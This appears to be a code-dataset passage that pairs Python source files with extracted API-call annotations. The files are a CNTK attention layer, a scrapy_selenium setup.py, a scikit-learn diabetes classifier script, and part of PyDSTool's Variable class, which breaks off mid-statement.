import cntk as C
from cntk.ops.functions import Function
from cntk.default_options import default_options, get_default_override, default_override_or
from cntk.initializer import glorot_uniform
from ..layers import Dense, Label
from ..blocks import Stabilizer, _inject_name # helpers
from ..sequence import PastValueWindow
#from .. import *
# AttentionModel block
def AttentionModel(attention_dim, attention_span=None, attention_axis=None,
init=default_override_or(glorot_uniform()),
go_backwards=default_override_or(False),
enable_self_stabilization=default_override_or(True), name=''):
'''
AttentionModel(attention_dim, attention_span=None, attention_axis=None, init=glorot_uniform(), go_backwards=False, enable_self_stabilization=True, name='')
Layer factory function to create a function object that implements an attention model
as described in Bahdanau, et al., "Neural machine translation by jointly learning to align and translate."
'''
init = get_default_override(AttentionModel, init=init)
go_backwards = get_default_override(AttentionModel, go_backwards=go_backwards)
enable_self_stabilization = get_default_override(AttentionModel, enable_self_stabilization=enable_self_stabilization)
# until CNTK can handle multiple nested dynamic loops, we require fixed windows and fake it
if attention_span is None or attention_axis is None:
raise NotImplementedError('AttentionModel currently requires a fixed attention_span and a static attention_axis to be specified')
if attention_span <= 0:
raise ValueError('attention_span must be a positive value')
# model parameters
with default_options(bias=False): # all the projections have no bias
attn_proj_enc = Stabilizer(enable_self_stabilization=enable_self_stabilization) >> Dense(attention_dim, init=init, input_rank=1) # projects input hidden state, keeping span axes intact
attn_proj_dec = Stabilizer(enable_self_stabilization=enable_self_stabilization) >> Dense(attention_dim, init=init, input_rank=1) # projects decoder hidden state, but keeping span and beam-search axes intact
        attn_proj_tanh = Stabilizer(enable_self_stabilization=enable_self_stabilization) >> Dense(1, init=init, input_rank=1) # projects tanh output, keeping span and beam-search axes intact
attn_final_stab = Stabilizer(enable_self_stabilization=enable_self_stabilization)
# attention function
@Function
def attention(h_enc, h_dec):
        history_axis = h_dec # h_dec doubles as history_axis: it is passed around only so that its dynamic axis can be referenced
# TODO: pull this apart so that we can compute the encoder window only once and apply it to multiple decoders
# --- encoder state window
(h_enc, h_enc_valid) = PastValueWindow(attention_span, axis=attention_axis, go_backwards=go_backwards)(h_enc).outputs
h_enc_proj = attn_proj_enc(h_enc)
# window must be broadcast to every decoder time step
h_enc_proj = C.sequence.broadcast_as(h_enc_proj, history_axis)
h_enc_valid = C.sequence.broadcast_as(h_enc_valid, history_axis)
# --- decoder state
# project decoder hidden state
h_dec_proj = attn_proj_dec(h_dec)
tanh_out = C.tanh(h_dec_proj + h_enc_proj) # (attention_span, attention_dim)
u = attn_proj_tanh(tanh_out) # (attention_span, 1)
        u_masked = u + (h_enc_valid - 1) * 50 # push unused elements towards log-zero so they vanish from the softmax denominator. TODO: use a less arbitrary constant than 50
attention_weights = C.softmax(u_masked, axis=attention_axis) #, name='attention_weights')
attention_weights = Label('attention_weights')(attention_weights)
# now take weighted sum over the encoder state vectors
h_att = C.reduce_sum(C.element_times(h_enc_proj, attention_weights), axis=attention_axis)
h_att = attn_final_stab(h_att)
return h_att
return _inject_name(attention, name)
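# Editor's usage sketch (hypothetical sizes, not part of the original module):
# attn = AttentionModel(attention_dim=128, attention_span=20, attention_axis=-3)
# h_att = attn(h_enc, h_dec)   # per decoder step, a weighted sum over the
#                              # windowed encoder states, of size attention_dim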
|
[
"cntk.default_options.default_override_or",
"cntk.default_options.get_default_override",
"cntk.softmax",
"cntk.tanh",
"cntk.initializer.glorot_uniform",
"cntk.element_times",
"cntk.default_options.default_options",
"cntk.sequence.broadcast_as"
] |
[((921, 947), 'cntk.default_options.default_override_or', 'default_override_or', (['(False)'], {}), '(False)\n', (940, 947), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((994, 1019), 'cntk.default_options.default_override_or', 'default_override_or', (['(True)'], {}), '(True)\n', (1013, 1019), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((1442, 1489), 'cntk.default_options.get_default_override', 'get_default_override', (['AttentionModel'], {'init': 'init'}), '(AttentionModel, init=init)\n', (1462, 1489), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((1522, 1585), 'cntk.default_options.get_default_override', 'get_default_override', (['AttentionModel'], {'go_backwards': 'go_backwards'}), '(AttentionModel, go_backwards=go_backwards)\n', (1542, 1585), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((1618, 1712), 'cntk.default_options.get_default_override', 'get_default_override', (['AttentionModel'], {'enable_self_stabilization': 'enable_self_stabilization'}), '(AttentionModel, enable_self_stabilization=\n enable_self_stabilization)\n', (1638, 1712), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((870, 886), 'cntk.initializer.glorot_uniform', 'glorot_uniform', ([], {}), '()\n', (884, 886), False, 'from cntk.initializer import glorot_uniform\n'), ((2129, 2156), 'cntk.default_options.default_options', 'default_options', ([], {'bias': '(False)'}), '(bias=False)\n', (2144, 2156), False, 'from cntk.default_options import default_options, get_default_override, default_override_or\n'), ((3484, 3533), 'cntk.sequence.broadcast_as', 'C.sequence.broadcast_as', (['h_enc_proj', 'history_axis'], {}), '(h_enc_proj, history_axis)\n', (3507, 3533), True, 'import cntk as C\n'), ((3557, 3607), 'cntk.sequence.broadcast_as', 'C.sequence.broadcast_as', (['h_enc_valid', 'history_axis'], {}), '(h_enc_valid, history_axis)\n', (3580, 3607), True, 'import cntk as C\n'), ((3736, 3767), 'cntk.tanh', 'C.tanh', (['(h_dec_proj + h_enc_proj)'], {}), '(h_dec_proj + h_enc_proj)\n', (3742, 3767), True, 'import cntk as C\n'), ((4058, 4098), 'cntk.softmax', 'C.softmax', (['u_masked'], {'axis': 'attention_axis'}), '(u_masked, axis=attention_axis)\n', (4067, 4098), True, 'import cntk as C\n'), ((4294, 4340), 'cntk.element_times', 'C.element_times', (['h_enc_proj', 'attention_weights'], {}), '(h_enc_proj, attention_weights)\n', (4309, 4340), True, 'import cntk as C\n')]
|
from setuptools import setup, find_packages
setup(
name='scrapy_selenium',
version='0.0.9',
    description='Selenium Middleware for Scrapy that allows for multiple concurrent headless browsers.',
long_description=open('README.md').read(),
long_description_content_type="text/markdown",
keywords='scrapy selenium middleware webdriver web-scraping',
license='MIT',
author='<NAME>',
author_email='<EMAIL>',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
url='https://github.com/dylanwalker/better-scrapy-selenium',
python_requires='>=3.5',
packages=find_packages(),
install_requires=[
"scrapy>=1.0.0",
"selenium>=3.0.0"
],
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Operating System :: OS Independent",
],
extras_require={
"dev": [
"pytest>=3.7",
]
}
)
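# Editor's note (usage, not part of the original file): install locally with
# the optional development dependencies declared above via
#   pip install -e ".[dev]"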
|
[
"setuptools.find_packages"
] |
[((601, 616), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (614, 616), False, 'from setuptools import setup, find_packages\n')]
|
import pickle
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import confusion_matrix, accuracy_score
def pre_processing(X):
    # currently a no-op; uncomment (and import StandardScaler from
    # sklearn.preprocessing) to enable feature scaling
    # sc = StandardScaler()
    # X = sc.fit_transform(X)
    return X
def training():
df = pd.read_csv("datasets/Diabetes.csv")
    y = df[["Outcome"]]
    df.drop("Outcome", axis="columns", inplace=True)
    X = df
# X = df.iloc[:, :-1].values
# y = df.iloc[:, -1].values
# X=pre_processing(X)
dummyRow_diabetes=pd.DataFrame(np.zeros(len(X.columns)).reshape(1,len(X.columns)), columns=X.columns)
dummyRow_diabetes.to_csv('datasets/dummyRow_diabetes.csv', index=False)
# from sklearn.neighbors import KNeighborsClassifier
# classifier = KNeighborsClassifier(n_neighbors = 5, metric = 'minkowski', p = 2)
# classifier.fit(X_train, y_train)
# from sklearn.linear_model import LogisticRegression
# classifier = LogisticRegression(random_state=0)
# classifier.fit(X_train, y_train)
    classifier = DecisionTreeClassifier(criterion='entropy', random_state=0)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
    # Fit on the training split only for evaluation; fitting on all of X first
    # and then scoring on X_test would leak training samples into the metrics.
    classifier.fit(X_train, y_train)
    y_pred = classifier.predict(X_test)
    cm = confusion_matrix(y_test, y_pred)
    print(cm)
    print(accuracy_score(y_test, y_pred))
    # Refit on the full dataset before persisting the deployed model.
    classifier.fit(X, y)
    pkl_filename = "datasets/pickle_model_diabetes.pkl"
    with open(pkl_filename, 'wb') as file:
        pickle.dump(classifier, file)
def pred(ob):
    d1 = ob.to_dict()
    df = pd.DataFrame(d1, index=[0])
# df=pre_processing(df)
# df.drop("Disease", axis="columns", inplace=True)
    dummyRow_filename = "datasets/dummyRow_diabetes.csv"
    df2 = pd.read_csv(dummyRow_filename)
    for c1 in df.columns:
        df2[c1] = df[c1]
        print(df2[c1])  # debug: echo each feature column as it is copied
    pkl_filename = 'datasets/pickle_model_diabetes.pkl'
    with open(pkl_filename, 'rb') as file:
        classifier = pickle.load(file)
    prediction = classifier.predict(df2)  # avoid shadowing the function name pred
    return prediction
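# Editor's usage sketch (hypothetical call, not in the original script): after
# running training() once, score a single record whose keys match the feature
# columns of datasets/Diabetes.csv, e.g. via a pandas Series:
#   cols = pd.read_csv("datasets/dummyRow_diabetes.csv").columns
#   sample = pd.Series({c: 0 for c in cols})   # replace the 0s with real values
#   print(pred(sample))                        # array with the predicted Outcome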
if __name__ == "__main__":
    training()
|
[
"pandas.DataFrame",
"pickle.dump",
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.metrics.accuracy_score",
"sklearn.tree.DecisionTreeClassifier",
"pickle.load",
"sklearn.metrics.confusion_matrix"
] |
[((390, 426), 'pandas.read_csv', 'pd.read_csv', (['"""datasets/Diabetes.csv"""'], {}), "('datasets/Diabetes.csv')\n", (401, 426), True, 'import pandas as pd\n'), ((1140, 1199), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ([], {'criterion': '"""entropy"""', 'random_state': '(0)'}), "(criterion='entropy', random_state=0)\n", (1162, 1199), False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((1243, 1297), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.25)', 'random_state': '(0)'}), '(X, y, test_size=0.25, random_state=0)\n', (1259, 1297), False, 'from sklearn.model_selection import train_test_split\n'), ((1516, 1548), 'sklearn.metrics.confusion_matrix', 'confusion_matrix', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1532, 1548), False, 'from sklearn.metrics import confusion_matrix, accuracy_score\n'), ((1647, 1674), 'pandas.DataFrame', 'pd.DataFrame', (['d1'], {'index': '[0]'}), '(d1, index=[0])\n', (1659, 1674), True, 'import pandas as pd\n'), ((1820, 1850), 'pandas.read_csv', 'pd.read_csv', (['dummyRow_filename'], {}), '(dummyRow_filename)\n', (1831, 1850), True, 'import pandas as pd\n'), ((1438, 1467), 'pickle.dump', 'pickle.dump', (['classifier', 'file'], {}), '(classifier, file)\n', (1449, 1467), False, 'import pickle\n'), ((1573, 1603), 'sklearn.metrics.accuracy_score', 'accuracy_score', (['y_test', 'y_pred'], {}), '(y_test, y_pred)\n', (1587, 1603), False, 'from sklearn.metrics import confusion_matrix, accuracy_score\n'), ((2038, 2055), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (2049, 2055), False, 'import pickle\n')]
|
"""Variable is a one-dimensional discrete and continuous real variable class.
<NAME>, July 2005
"""
# ----------------------------------------------------------------------------
from __future__ import absolute_import, print_function
# PyDSTool imports
from .utils import *
from .common import *
from .common import (
_num_types,
_num_equivtype,
_float_types,
_real_types,
_int_types,
_seq_types,
_num_type2name,
_num_name2type,
_num_name2equivtypes,
_all_float,
_all_int,
_all_complex,
_num_maxmin,
)
from .errors import *
from .Points import *
from .Interval import *
from .FuncSpec import ImpFuncSpec
from numpy import (
Inf,
NaN,
isfinite,
sometrue,
alltrue,
any,
all,
array,
float64,
int32,
ndarray,
asarray,
)
import copy
import types, math, random
import six
__all__ = [
"Variable",
"HybridVariable",
"OutputFn",
"isinputcts",
"isinputdiscrete",
"isoutputcts",
"isoutputdiscrete",
"iscontinuous",
"isdiscrete",
"numeric_to_vars",
"pointset_to_vars",
]
# ------------------------------------------------------------------
class VarDiagnostics(Diagnostics):
    def getWarnings(self):
        if self.warnings:
            output = "Warnings:"
            for (i, d) in self.warnings:
                if d is None:
                    output += (
                        "\nIndependent variable value %s was out of bounds" % i
                    )
                else:
                    output += (
                        "\nDependent variable value was out of "
                        + "bounds at independent variable value %s" % i
                    )
        else:
            output = ""
        return output
def pointset_to_vars(pts, discrete=True):
"""Utility to convert Pointset to a dictionary of Variables.
If discrete option set to False (default is True) then the
Variables will be linearly interpolated within their domain.
Any labels in the pointset will be preserved in the Variables
in case of their re-extraction using the getDataPoints method.
"""
coordnames = pts.coordnames
vals = pts.coordarray
all_types_float = pts.coordtype == float
if isparameterized(pts):
indepvar = pts.indepvararray
indepvarname = pts.indepvarname
if discrete:
indepvartype = int
else:
indepvartype = float
indepdomain = Interval(
pts.indepvarname,
indepvartype,
extent(pts.indepvararray),
abseps=pts._abseps,
)
else:
indepvar = None
indepvarname = None
indepdomain = None
return numeric_to_vars(
vals,
coordnames,
indepvar,
indepvarname,
indepdomain,
all_types_float,
discrete,
pts._abseps,
pts.labels,
)
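# Editor's usage sketch (hypothetical data, not part of the original module):
# pts = Pointset({'coordnames': 'x', 'coordarray': [0., 1., 4.],
#                 'indepvarname': 't', 'indepvararray': [0., 1., 2.]})
# v = pointset_to_vars(pts, discrete=False)['x']
# v(1.5)   # -> 2.5, linear interpolation between v(1.) == 1. and v(2.) == 4.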
def numeric_to_vars(
vals,
coordnames,
indepvar=None,
indepvarname="t",
indepdomain=None,
all_types_float=True,
discrete=True,
abseps=None,
labels=None,
):
"""Utility to convert numeric types to a dictionary of Variables.
    If discrete option set to False (default is True) then the
    Variables will be linearly interpolated within their domain.
"""
if isinstance(coordnames, str):
coordnames = [coordnames]
if isinstance(vals, _num_types):
vals = [[vals]]
vars = {}
if indepvar is None:
for i, c in enumerate(coordnames):
if all_types_float:
vartype = float
else:
vartype = array(vals[i]).dtype.type
if discrete:
vars[c] = Variable(
outputdata=Pointset(
{"coordnames": c, "coordarray": vals[i], "coordtype": vartype}
),
name=c,
abseps=abseps,
labels=labels,
)
else:
raise AssertionError(
"Cannot use continuously defined "
"option without an independent variable"
)
return vars
else:
if isinstance(indepvar, _num_types):
indepvartype = type(indepvar)
indepvar = [indepvar]
else:
indepvartype = asarray(indepvar).dtype.type
if indepdomain is None:
indepdomain = indepvarname
else:
if isinstance(indepdomain, Interval):
assert indepvarname == indepdomain.name, "Indep varname mismatch"
else:
if discrete:
var_type = int
else:
var_type = float
indepdomain = Interval(indepvarname, var_type, indepdomain)
for i, c in enumerate(coordnames):
if all_types_float:
vartype = float
else:
vartype = array(vals[i]).dtype.type
if discrete:
vars[c] = Variable(
outputdata=Pointset(
{
"coordnames": c,
"coordarray": vals[i],
"coordtype": vartype,
"indepvarname": indepvarname,
"indepvararray": indepvar,
"indepvartype": indepvartype,
}
),
indepdomain=indepdomain,
name=c,
abseps=abseps,
labels=labels,
)
else:
dom_int = Interval(c, vartype, extent(vals[i]), abseps=abseps)
vars[c] = Variable(
outputdata=interp1d(indepvar, vals[i]),
indepdomain=indepdomain,
depdomain=dom_int,
name=c,
abseps=abseps,
labels=labels,
)
return vars
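# Editor's usage sketch (hypothetical values, not part of the original module):
# vs = numeric_to_vars([[0., 2., 8.]], ['y'], indepvar=[0., 1., 2.],
#                      discrete=False)
# vs['y'](0.5)   # -> 1.0 by linear interpolation over the supplied mesh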
class Variable(object):
"""One-dimensional discrete and continuous real variable class.
"""
def __init__(
self,
outputdata=None,
indepdomain=None,
depdomain=None,
name="noname",
abseps=None,
labels=None,
):
# funcreg stores function data for dynamically created methods
# to allow a Variable to be copied using pickling
self._funcreg = {}
if isinstance(name, str):
# !!! name is probably redundant
self.name = name
else:
raise TypeError("name argument must be a string")
# defaults for empty 'placeholder' Variables used by ODEsystem
if outputdata is None or isinstance(outputdata, (Pointset, interp1d)):
if indepdomain is None:
indepdomain = "t"
if depdomain is None:
depdomain = "x"
# set some initial values so that can test if what changed
# after calling setOutput()
self._vectorizable = True
self.defined = False
self.indepdomain = None
self.indepvartype = None
self.indepvarname = None
self.depdomain = None
self.coordtype = None
self.coordname = None
self._refvars = None # for use with ExplicitFnGen
# Ranges covered by the current trajectory held (if known)
self.trajirange = None
self.trajdrange = None
# independent variable domain
self.setIndepdomain(indepdomain, abseps)
# used internally, especially for "input" variables
self._internal_t_offset = 0
# output function
self.setOutput(outputdata, abseps)
# dependent variable domain
self.setDepdomain(depdomain, abseps)
assert self.coordname != self.indepvarname, (
"Independent variable " "name and coordinate name must be different"
)
self.diagnostics = VarDiagnostics()
# labels is for internal use in case Variable data is from a Pointset
# that uses labels. This preserves them for getDataPoints method to
# restore them.
self.labels = labels
def is_continuous_valued(self):
return isoutputcts(self)
def is_discrete_valued(self):
return not isoutputcts(self)
# Auxiliary functions for user-defined code to call
def _auxfn_globalindepvar(self, parsinps, t):
return self.globalt0 + t
def _auxfn_initcond(self, parsinps, varname):
return self.initialconditions[varname]
def _auxfn_heav(self, parsinps, x):
if x > 0:
return 1
else:
return 0
def _auxfn_if(self, parsinps, c, e1, e2):
if c:
return e1
else:
return e2
def _auxfn_getindex(self, parsinps, varname):
return self._var_namemap[varname]
def addMethods(self, funcspec):
"""Add dynamically-created methods to Veriable object"""
# Add the auxiliary function specs to this Variable's namespace
for auxfnname in funcspec.auxfns:
fninfo = funcspec.auxfns[auxfnname]
if not hasattr(Variable, fninfo[1]):
# user-defined auxiliary functions
# (built-ins are provided explicitly)
try:
six.exec_(fninfo[0], globals())
except:
print("Error in supplied auxiliary function code")
raise
self._funcreg[fninfo[1]] = ("Variable", fninfo[0])
setattr(Variable, fninfo[1], eval(fninfo[1]))
# Add the spec function to this Variable's namespace
fninfo_spec = funcspec.spec
if not hasattr(Variable, fninfo_spec[1]):
try:
six.exec_(fninfo_spec[0], globals())
except:
print("Error in supplied functional specification code")
raise
self._funcreg[fninfo_spec[1]] = ("Variable", fninfo_spec[0])
setattr(Variable, fninfo_spec[1], eval(fninfo_spec[1]))
# Add the auxiliary spec function (if present) to this Var's namespace
if funcspec.auxspec:
fninfo_auxspec = funcspec.auxspec
if not hasattr(Variable, fninfo_auxspec[1]):
try:
six.exec_(fninfo_auxspec[0], globals())
except:
print("Error in supplied auxiliary variable code")
raise
self._funcreg[fninfo_auxspec[1]] = ("Variable", fninfo_auxspec[0])
setattr(Variable, fninfo_auxspec[1], eval(fninfo_auxspec[1]))
# For implicit functions
if isinstance(funcspec, ImpFuncSpec):
impfn_name = funcspec.algparams["impfn_name"]
if funcspec.algparams["jac"]:
jac_str = "fprime=funcspec.algparams['jac'],"
else:
jac_str = ""
# Wrap spec fn like this as it has been set up as a
# method, but want to call as regular function
# *** ALSO *** spec fn has signature (ds, t, x, p)
# but implicit function solvers expect
# (x, t, p), so have to switch 1st and 2nd args here
# after 'ds' filled with None
if len(funcspec.vars) == 1:
# dimension == 1, so have to make list output from spec
# into a scalar
# Also, scalar a1 needs to be put into list form for
# acceptance as x in spec fn
specfn_str = (
"lambda a1, a2, a3: " + fninfo_spec[1] + "(None, a2, [a1], a3)[0]"
)
else:
# for dimension > 1 a1 will already be an array / list
specfn_str = (
"lambda a1, a2, a3: " + fninfo_spec[1] + "(None, a2, a1, a3)"
)
this_scope = globals() # WE CHANGE GLOBALS()
this_scope.update(
{
"funcspec": locals()["funcspec"],
"fninfo_spec": locals()["fninfo_spec"],
}
)
impfn_str = (
impfn_name
+ " = makeImplicitFunc("
+ specfn_str
+ ","
+ jac_str
+ """x0=funcspec.algparams['x0'],
extrafargs=(funcspec.algparams['pars'],),
xtolval=funcspec.algparams['atol'],
maxnumiter=funcspec.algparams['maxnumiter'],
solmethod=funcspec.algparams['solvemethod'],
standalone=False)"""
)
try:
six.exec_(impfn_str, this_scope)
except:
print("Error in supplied implicit function code")
raise
# record special reference to the implicit fn,
# as its a method of Variable (for delete method).
self._funcreg["_impfn"] = (impfn_name, impfn_str)
# In previous versions setattr was to self, not the Variable class
setattr(Variable, impfn_name, eval(impfn_name))
# clean up globals() afterwards
del this_scope["funcspec"]
del this_scope["fninfo_spec"]
def getDataPoints(self):
"""Reveal underlying mesh and values at mesh points, provided
Variable is based on a mesh (otherwise None is returned).
The returned Pointset will be time-shifted according to the
Variable's current _internal_t_offset attribute.
Any pointset labels present when the variable was created will
be restored.
"""
if isinstance(self.output, VarCaller):
return Pointset(
indepvarname=self.indepvarname,
indepvararray=self.output.pts.indepvararray + self._internal_t_offset,
coordnames=[self.coordname],
coordarray=self.output.pts.coordarray[0],
labels=self.labels,
)
elif hasattr(self.output, "datapoints"):
datapoints = self.output.datapoints
return Pointset(
indepvarname=self.indepvarname,
indepvararray=datapoints[0] + self._internal_t_offset,
coordnames=[self.coordname],
coordarray=datapoints[1],
labels=self.labels,
)
else:
return None
def underlyingMesh(self):
"""Reveal underlying mesh as arrays, rather than Pointset
as returned by getDataPoints method. If no underlying mesh is
present, None is returned."""
try:
# works if .output is an interpclass instance
mesh = self.output.datapoints
except AttributeError:
try:
# works if .output is a VarCaller instance (with underlying Pointset)
pts = self.output.pts
mesh = array([pts.indepvararray, pts.coordarray[0]])
except AttributeError:
mesh = None
return mesh
def truncate_to_idx(self, idx):
mesh = self.underlyingMesh()
if mesh is None:
raise RuntimeError(
"Cannot truncate a Variable without an underlying mesh by index"
)
try:
new_t_end = mesh[0][idx]
except IndexError:
raise ValueError("Truncation index %d out of range" % idx)
except TypeError:
raise TypeError("Index must be an integer")
if isinstance(self.indepdomain, Interval):
self.indepdomain.set([self.indepdomain[0], new_t_end])
else:
# ndarray type
self.indepdomain = self.indepdomain[0:idx]
# adjust depdomain for array type of dep domain
# (nothing to change for Interval type)
if isinstance(self.depdomain, ndarray):
self.depdomain = self.depdomain[0:idx]
# adjust trajirange and trajdrange
self._setRanges(self.depdomain._abseps)
def _setRanges(self, abseps=None):
# set trajirange and trajdrange for the two types of Variable output method
# that these are associated with (see method setOutput)
try:
output = self.output
except AttributeError:
# output not set or not a compatible type for trajirange and trajdrange
return
if isinstance(output, VarCaller):
self.trajirange = Interval(
"traj_indep_bd",
self.indepvartype,
extent(output.pts.indepvararray),
abseps=abseps,
)
self.trajdrange = Interval(
"traj_dep_bd",
self.coordtype,
extent(output.pts.coordarray[0]),
abseps=abseps,
)
elif isinstance(output, (OutputFn, interpclass) + six.class_types):
if hasattr(output, "types"):
deptype = output.types[0]
indeptype = output.types[1]
else:
# default
deptype = indeptype = float
if isinstance(output.datapoints[0], Interval):
assert compareNumTypes(
output.types[0], output.datapoints[0].type
), "Inconsistent type with Interval bounds"
self.trajirange = output.datapoints[0]
else:
self.trajirange = Interval(
"traj_indep_bd",
indeptype,
extent(output.datapoints[0]),
abseps=abseps,
)
if isinstance(output.datapoints[1], Interval):
assert compareNumTypes(
output.types[1], output.datapoints[1].type
), "Inconsistent type with Interval bounds"
self.trajdrange = output.datapoints[1]
else:
self.trajdrange = Interval(
"traj_dep_bd", deptype, extent(output.datapoints[1]), abseps=abseps
)
def setOutput(
self,
outputdata,
funcspec=None,
globalt0=0,
var_namemap=None,
ics=None,
refvars=None,
abseps=None,
):
"""Dynamically create 'output' method of Variable"""
self.globalt0 = globalt0
if type(outputdata) in [
types.FunctionType,
types.BuiltinFunctionType,
types.MethodType,
]:
# Variable generated from function, given in closed form
self.output = outputdata
assert ics is None, "Invalid option for this type of output"
if outputdata != noneFn:
self.defined = True
elif isinstance(outputdata, tuple):
# For ExplicitFnGen or ImplicitFnGen types, whose functional forms
# may need to access these at call time.
assert len(outputdata) == 2, "Incorrect size of outputdata tuple"
if funcspec is not None:
self.addMethods(funcspec)
self._var_namemap = var_namemap
self._funcreg["funcspec"] = (None, funcspec)
else:
raise ValueError("funcspec missing in setOutput")
# Add the specific mapping functions for Ex/ImplicitFnGen objects
try:
six.exec_(outputdata[1], globals())
except:
print("Internal Error in _mapspecfn code")
raise
has_op = hasattr(self, "output")
# have to define this function in here because use of lambda
# won't allow me to pickle the Variable object
if not has_op or (has_op and self.output is noneFn):
def wrap_output(arg):
return eval(outputdata[0])(self, arg)
setattr(self, "output", wrap_output)
self._funcreg["outputdata"] = (None, outputdata)
t0 = self.indepdomain[0]
if ics is None and not isinstance(funcspec, ImpFuncSpec):
try:
self.initialconditions = {self.coordname: self.output(t0)}
except ValueError:
self.initialconditions = {self.coordname: NaN}
except TypeError:
print("Debugging info: self.output = %s" % self.output)
raise
else:
self.initialconditions = ics
self._vectorizable = False
self._refvars = refvars
self.defined = True
elif isinstance(outputdata, (OutputFn, interpclass) + six.class_types):
# Variable generated by callable object that generates values over
# mesh points that it holds, e.g. by interpolation
# (InstanceType and TypeType are for backwards compatibility, e.g.
# for old SciPy interpolate code that uses Classic Classes)
assert ics is None, "Invalid option for this type of output"
assert "__call__" in dir(outputdata), "Must provide callable object"
self.output = outputdata
if hasattr(outputdata, "datapoints"):
self._setRanges(abseps)
self.defined = True
elif isinstance(outputdata, Pointset):
# Variable generated from a pointset (without interpolation)
assert ics is None, "Invalid option for this type of output"
assert isparameterized(outputdata), (
"Must only pass parameterized" " pointsets"
)
if outputdata.dimension == 1:
self.coordname = copy.copy(outputdata.coordnames[0])
self.indepvarname = outputdata.indepvarname
self.output = VarCaller(outputdata)
self.coordtype = outputdata.coordtype
self.indepvartype = outputdata.indepvartype
if self.indepdomain is not None:
for v in outputdata[self.indepvarname]:
if not v in self.indepdomain:
raise ValueError(
"New Pointset data violates "
"independent variable domain already specified"
)
if self.depdomain is not None:
for v in outputdata[self.coordname]:
if not v in self.depdomain:
raise ValueError(
"New Pointset data violates "
"dependent variable domain already specified"
)
self._setRanges(abseps)
self.defined = True
else:
raise ValueError("Pointset data must be 1D to create a " "Variable")
elif outputdata is None:
# placeholder for an unknown output type
assert ics is None, "Invalid option when outputdata argument is None"
self.output = noneFn
self.defined = False
else:
raise TypeError("Invalid type for data argument: " + str(type(outputdata)))
def setIndepdomain(self, indepdomain, abseps=None):
if isinstance(indepdomain, str):
self.indepvarname = indepdomain
if self.indepdomain is not None:
# If indepdomain already set and indepvarname is none then
# name won't get put in place unless we force it here
self.indepvarname = indepdomain
self.indepdomain.name = indepdomain
else:
self.indepdomain = Interval(
self.indepvarname, float, [-Inf, Inf], abseps=abseps
)
self.indepvartype = float
else:
if isinstance(indepdomain, Interval):
if self.trajirange:
if indepdomain.contains(self.trajirange) is notcontained:
raise ValueError(
"Cannot set independent variable"
" domain inside current trajectory's"
" range"
)
self.indepdomain = indepdomain
self.indepvarname = indepdomain.name
self.indepvartype = _num_name2type[indepdomain.typestr]
elif isinstance(indepdomain, dict):
# enumerated discrete domains
assert len(indepdomain) == 1, (
"Independent variable " "dictionary must have only 1 entry"
)
d = list(indepdomain.values())[0]
assert all(isfinite(d)), "Independent variable values must be" " finite"
if self.trajirange:
assert self.trajirange[0] in d
assert self.trajirange[1] in d
self.indepvarname = list(indepdomain.keys())[0]
if isinstance(d, (list, tuple)):
if self.coordtype is not None:
self.indepdomain = array(d, self.coordtype)
else:
self.indepdomain = array(d)
elif isinstance(d, ndarray):
da = array(d)
if (
self.indepvartype is not None
and self.indepvartype != da.dtype.type
):
raise TypeError(
"Mismatch between type of indepdomain "
"argument and Pointset data"
)
else:
self.indepdomain = da
else:
raise TypeError("Invalid type for independent " "variable domain")
# assert this after self.indepdomain has been made an array
# because isincreasing is most efficient on already-created
# arrays
assert isincreasing(
self.indepdomain
), "Independent variable values must be increasing"
self.indepvartype = self.indepdomain.dtype.type
else:
print("Independent variable argument domain was: %r" % indepdomain)
raise TypeError("Invalid type for independent variable " "domain")
def setDepdomain(self, depdomain, abseps=None):
if isinstance(depdomain, str):
self.coordname = depdomain
if self.depdomain is None:
if self.coordtype is None:
self.depdomain = Interval(
self.coordname, float, [-Inf, Inf], abseps=abseps
)
self.coordtype = float
else:
self.depdomain = Interval(
self.coordname,
self.coordtype,
_num_maxmin[self.coordtype],
abseps=abseps,
)
else:
# If interp functions supplied then don't have a name for
# Interval yet, so update it.
if isinstance(self.output, interpclass) and isinstance(
self.depdomain, Interval
):
self.depdomain.name = depdomain
else:
assert isinstance(self.output, Pointset)
self.diagnostics.warnings.append(
(
self.depdomain.name,
"Dependent variable already named. "
"Ignoring user-supplied name.",
)
)
else:
if isinstance(depdomain, Interval):
if self.trajdrange:
if depdomain.contains(self.trajdrange) is notcontained:
raise ValueError(
"Cannot set dependent variable "
"domain inside current trajectory's "
"range"
)
self.depdomain = depdomain
self.coordname = depdomain.name
if self.coordtype is None:
self.coordtype = depdomain.type
elif self.coordtype == depdomain.type:
pass
else:
raise TypeError(
"Mismatch between type of depdomain "
"argument and Pointset coord data"
)
elif isinstance(depdomain, dict):
                assert (
                    len(depdomain) == 1
                ), "Dependent variable dictionary must have only 1 entry"
d = list(depdomain.values())[0]
if self.trajdrange:
assert self.trajdrange[0] in d
assert self.trajdrange[1] in d
## Assume d is in increasing order
assert all(isfinite(d)), "Values must be finite"
self.coordname = list(depdomain.keys())[0]
if isinstance(d, (list, tuple)):
if self.coordtype is not None:
self.depdomain = array(d, self.coordtype)
else:
self.depdomain = array(d)
elif isinstance(d, ndarray):
da = array(d)
if self.coordtype is not None and self.coordtype != da.dtype.type:
raise TypeError(
"Mismatch between type of depdomain "
"argument and Pointset coord data"
)
else:
self.depdomain = da
else:
raise TypeError("Invalid type for dependent variable " "domain")
self.coordtype = self.depdomain.dtype.type
else:
print("Dependent variable domain argument was: %r" % depdomain)
raise TypeError("Invalid type for dependent variable domain")
if isinstance(self.output, Pointset):
assert (
